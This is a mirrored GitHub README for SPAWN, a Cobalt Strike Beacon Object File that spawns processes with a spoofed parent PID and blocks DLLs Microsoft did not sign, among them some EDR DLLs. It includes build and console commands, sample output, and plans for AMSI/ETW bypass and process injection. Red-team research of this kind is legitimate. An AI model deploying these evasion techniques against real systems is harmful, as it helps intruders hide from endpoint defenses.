qqvirus / SPAWN

Cobalt Strike Beacon Object File (BOF) that takes the name of of a PE file as an argument and spawns the process in a suspended state

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

SPAWN - Cobalt Strike BOF

Beacon Object File (BOF) that spawns an arbitrary process from beacons memory. Supports Parent Process ID (PPID) spoofing & blocking non-MS signed DLLs from loading into the processes memory (some EDR DLLs).

New Features (07/19/2021)

  • CNA Agressor Script interface
beacon> help
    spawn                     Spawn a process with a spoofed PPID and blockDll
beacon> help spawn
Synopsis: spawn /path/to/exe PPID
beacon> ps
8264  5536  OneDrive.exe                 x86   1           DESKTOP-KOSR2NO\boku 
beacon> spawn cmd.exe 8264
[*] SPAWN (@0xBoku|github.com/boku7)
Opened handle 0x634 to process 8264(PID)
Success! Spawned process: cmd.exe | PID: 5384 | PPID: 8264
  • PPID Spoofing
  • Cobalt Strike "like" blockdll functionality

Compile with x64 MinGW:

x86_64-w64-mingw32-gcc -c spawnSuspendedProcess.c -o spawnSuspendedProcess.o

Run from Cobalt Strike Beacon Console

  • After compile import the spawn.cna script into Cobalt Strikes Script Manager
beacon> spawn /path/to/exe PPID

To Do List

  • Agressor script for better end user experience
  • PPID spoofing for better parent-child process relation OPSEC
    • Here we can see our cmd.exe process being spawned with the PPID as OneDrive.exe
  • implement Cobalt Strike blockdll functionality to prevent non-MS signed DLLs from loading into the spawned processes memory
    • We see the parent-child process relationship, and that our spawned process has been created with the Signatures restricted (Microsoft only)
    • The Signatures restricted (Microsoft only) makes it so DLL's not signed by Microsoft cannot be loaded into our spawned process
  • Do not crash the beacon process when the PE file does not exist
    • No longer crashes on process creation failure!
  • Return the PID to the Cobalt Strike console when the new process is spawned
  • Build out different methods of remote process injection
  • Build out different methods of remote process patching
    • NTDLL.DLL remote process Unhooking
    • ETW remote process Patching/Bypass
    • AMSI remote process Patching/Bypass
    • CLR Loading & .Net assembly injection

Why did I build this?

1. To learn more about Cobalt Strike BOFs
2. I want flexibility in choosing my sacraficial processes.
  • Spawning the same process for every fork-and-run seems like bad/predictable OPSEC to me.
  • There are probably methods for this out there or built into CS already. Either way, I wanted to build my own.
3. I have allot of cool BOF ideas that I want to build on this.

Credits / References

PPID Spoofing & blockDll functionality
Raphael Mudge - Beacon Object Files - Luser Demo
Cobalt Strike - Beacon Object Files
BOF Code References
anthemtotheego/InlineExecute-Assembly
ajpc500/BOFs
trustedsec/CS-Situational-Awareness-BOF
Sektor7 Malware Dev Essentials course - learned how to do the early bird injection technique

About

Cobalt Strike Beacon Object File (BOF) that takes the name of of a PE file as an argument and spawns the process in a suspended state


Languages

Language:C 100.0%